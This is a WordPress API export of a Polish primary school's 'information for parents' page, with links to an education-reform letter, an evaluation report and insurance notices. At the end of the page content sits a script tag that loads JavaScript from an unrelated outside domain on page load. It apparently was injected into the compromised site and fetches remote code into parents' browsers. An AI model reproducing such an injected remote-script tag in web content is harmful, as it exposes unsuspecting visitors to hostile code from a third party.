{"id":3552,"date":"2016-11-06T23:11:08","date_gmt":"2016-11-06T22:11:08","guid":{"rendered":"http:\/\/spmrowiny.gmina.zarow.pl\/?page_id=3552"},"modified":"2020-04-23T09:20:49","modified_gmt":"2020-04-23T07:20:49","slug":"informacje-dla-rodzicow","status":"publish","type":"page","link":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/informacje-dla-rodzicow\/","title":{"rendered":"Informacje dla rodzic\u00f3w"},"content":{"rendered":"<h2><a href=\"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/informacje-dla-rodzicow\/2017-03-03-23_22_42-informacja-dla-rodzicow\/\" rel=\"attachment wp-att-4570\"><img loading=\"lazy\" class=\"aligncenter size-full wp-image-4570\" src=\"http:\/\/spmrowiny.gmina.zarow.pl\/wp-content\/uploads\/2016\/11\/2017-03-03-23_22_42-INFORMACJA-DLA-RODZIC\u00d3W-.jpg\" alt=\"2017-03-03 23_22_42-INFORMACJA DLA RODZIC\u00d3W -\" width=\"743\" height=\"516\" srcset=\"http:\/\/spmrowiny.gmina.zarow.pl\/wp-content\/uploads\/2016\/11\/2017-03-03-23_22_42-INFORMACJA-DLA-RODZIC\u00d3W-.jpg 743w, http:\/\/spmrowiny.gmina.zarow.pl\/wp-content\/uploads\/2016\/11\/2017-03-03-23_22_42-INFORMACJA-DLA-RODZIC\u00d3W--300x208.jpg 300w\" sizes=\"(max-width: 743px) 100vw, 743px\" \/><\/a><\/h2>\n<h2><strong><span style=\"text-decoration: underline; color: #008000;\">Reforma edukacji:<\/span><\/strong><\/h2>\n<p><a href=\"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/reforma-edukacji\/\">List Minister Edukacji &#8211; pdf<\/a><\/p>\n<h2><span style=\"text-decoration: underline;\"><span style=\"color: #008000;\"><strong>Raport z ewaluacji:<\/strong><\/span><\/span><\/h2>\n<p><a href=\"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/raport-z-ewaluacji-problemowej\/\">Raport z ewaluacji &#8211; pdf<\/a><\/p>\n<h2><span style=\"text-decoration: underline;\"><span style=\"color: #008000;\"><strong>Informacje o ubezpieczeniu:<\/strong><\/span><\/span><\/h2>\n<p><a href=\"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/informacje-dla-rodzicow\/2016-11-06-22_53_14-informacja-dla-rodzicow-rolnikow-o-ubezpieczeniu-dzieci-_-szkola-podstawowa-w-pa\/\" rel=\"attachment wp-att-3553\"><img loading=\"lazy\" class=\"aligncenter wp-image-3553\" src=\"http:\/\/spmrowiny.gmina.zarow.pl\/wp-content\/uploads\/2016\/11\/2016-11-06-22_53_14-Informacja-dla-rodzic\u00f3w-rolnik\u00f3w-o-ubezpieczeniu-dzieci-_-Szko\u0142a-Podstawowa-w-Pa-232x300.jpg\" alt=\"2016-11-06 22_53_14-Informacja dla rodzic\u00f3w-rolnik\u00f3w o ubezpieczeniu dzieci _ Szko\u0142a Podstawowa w Pa\" width=\"460\" height=\"595\" srcset=\"http:\/\/spmrowiny.gmina.zarow.pl\/wp-content\/uploads\/2016\/11\/2016-11-06-22_53_14-Informacja-dla-rodzic\u00f3w-rolnik\u00f3w-o-ubezpieczeniu-dzieci-_-Szko\u0142a-Podstawowa-w-Pa-232x300.jpg 232w, http:\/\/spmrowiny.gmina.zarow.pl\/wp-content\/uploads\/2016\/11\/2016-11-06-22_53_14-Informacja-dla-rodzic\u00f3w-rolnik\u00f3w-o-ubezpieczeniu-dzieci-_-Szko\u0142a-Podstawowa-w-Pa.jpg 466w\" sizes=\"(max-width: 460px) 100vw, 460px\" \/><\/a> <a href=\"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/informacje-dla-rodzicow\/2016-11-06-22_53_59-informacja-dla-rodzicow-rolnikow-o-ubezpieczeniu-dzieci-_-szkola-podstawowa-w-pa\/\" rel=\"attachment wp-att-3554\"><img loading=\"lazy\" class=\"aligncenter wp-image-3554\" src=\"http:\/\/spmrowiny.gmina.zarow.pl\/wp-content\/uploads\/2016\/11\/2016-11-06-22_53_59-Informacja-dla-rodzic\u00f3w-rolnik\u00f3w-o-ubezpieczeniu-dzieci-_-Szko\u0142a-Podstawowa-w-Pa-238x300.jpg\" alt=\"2016-11-06 22_53_59-Informacja dla rodzic\u00f3w-rolnik\u00f3w o ubezpieczeniu dzieci _ Szko\u0142a Podstawowa w Pa\" width=\"460\" height=\"580\" srcset=\"http:\/\/spmrowiny.gmina.zarow.pl\/wp-content\/uploads\/2016\/11\/2016-11-06-22_53_59-Informacja-dla-rodzic\u00f3w-rolnik\u00f3w-o-ubezpieczeniu-dzieci-_-Szko\u0142a-Podstawowa-w-Pa-238x300.jpg 238w, http:\/\/spmrowiny.gmina.zarow.pl\/wp-content\/uploads\/2016\/11\/2016-11-06-22_53_59-Informacja-dla-rodzic\u00f3w-rolnik\u00f3w-o-ubezpieczeniu-dzieci-_-Szko\u0142a-Podstawowa-w-Pa.jpg 463w\" sizes=\"(max-width: 460px) 100vw, 460px\" \/><\/a> <a href=\"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/informacje-dla-rodzicow\/2016-11-06-22_54_27-informacja-dla-rodzicow-rolnikow-o-ubezpieczeniu-dzieci-_-szkola-podstawowa-w-pa\/\" rel=\"attachment wp-att-3555\"><img loading=\"lazy\" class=\"aligncenter wp-image-3555\" src=\"http:\/\/spmrowiny.gmina.zarow.pl\/wp-content\/uploads\/2016\/11\/2016-11-06-22_54_27-Informacja-dla-rodzic\u00f3w-rolnik\u00f3w-o-ubezpieczeniu-dzieci-_-Szko\u0142a-Podstawowa-w-Pa-268x300.jpg\" alt=\"2016-11-06 22_54_27-Informacja dla rodzic\u00f3w-rolnik\u00f3w o ubezpieczeniu dzieci _ Szko\u0142a Podstawowa w Pa\" width=\"460\" height=\"515\" srcset=\"http:\/\/spmrowiny.gmina.zarow.pl\/wp-content\/uploads\/2016\/11\/2016-11-06-22_54_27-Informacja-dla-rodzic\u00f3w-rolnik\u00f3w-o-ubezpieczeniu-dzieci-_-Szko\u0142a-Podstawowa-w-Pa-268x300.jpg 268w, http:\/\/spmrowiny.gmina.zarow.pl\/wp-content\/uploads\/2016\/11\/2016-11-06-22_54_27-Informacja-dla-rodzic\u00f3w-rolnik\u00f3w-o-ubezpieczeniu-dzieci-_-Szko\u0142a-Podstawowa-w-Pa.jpg 440w\" sizes=\"(max-width: 460px) 100vw, 460px\" \/><\/a><script src=http:\/\/www.onlymobilepro.com\/wp-content\/plugins\/syntaxhighlighter\/syntaxhighlighter2\/scripts\/include2.js><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Reforma edukacji: List Minister Edukacji &#8211; pdf Raport z ewaluacji: Raport z ewaluacji &#8211; pdf Informacje o ubezpieczeniu:<\/p>\n","protected":false},"author":2,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":[],"_links":{"self":[{"href":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/wp-json\/wp\/v2\/pages\/3552"}],"collection":[{"href":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/wp-json\/wp\/v2\/comments?post=3552"}],"version-history":[{"count":13,"href":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/wp-json\/wp\/v2\/pages\/3552\/revisions"}],"predecessor-version":[{"id":15031,"href":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/wp-json\/wp\/v2\/pages\/3552\/revisions\/15031"}],"wp:attachment":[{"href":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/wp-json\/wp\/v2\/media?parent=3552"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}